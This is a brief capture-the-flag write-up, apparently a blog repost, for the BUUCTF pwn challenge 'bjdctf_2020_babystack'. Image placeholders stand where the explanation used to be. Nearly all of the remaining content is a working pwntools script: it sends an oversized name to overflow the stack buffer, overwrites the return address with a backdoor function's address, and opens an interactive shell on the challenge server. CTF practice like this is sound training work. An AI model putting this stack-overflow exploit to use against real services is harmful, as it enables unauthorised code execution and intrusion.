BUUCTF (pwn) bjdctf_2020_babystack

Insert picture description here
Insert picture description here
Insert picture description here

from pwn import *
p = remote("node3.buuoj.cn",27955)
sys = 0x04006E6
p.sendlineafter("[+]Please input the length of your name:\n",'200')
payload = 'a' * (0x10 + 0x8) + p64(sys) 
p.sendlineafter("[+]What's u name?\n",payload)
p.interactive()

If you have any questions, please leave a message ∑

Guess you like

Origin blog.csdn.net/weixin_45556441/article/details/115293003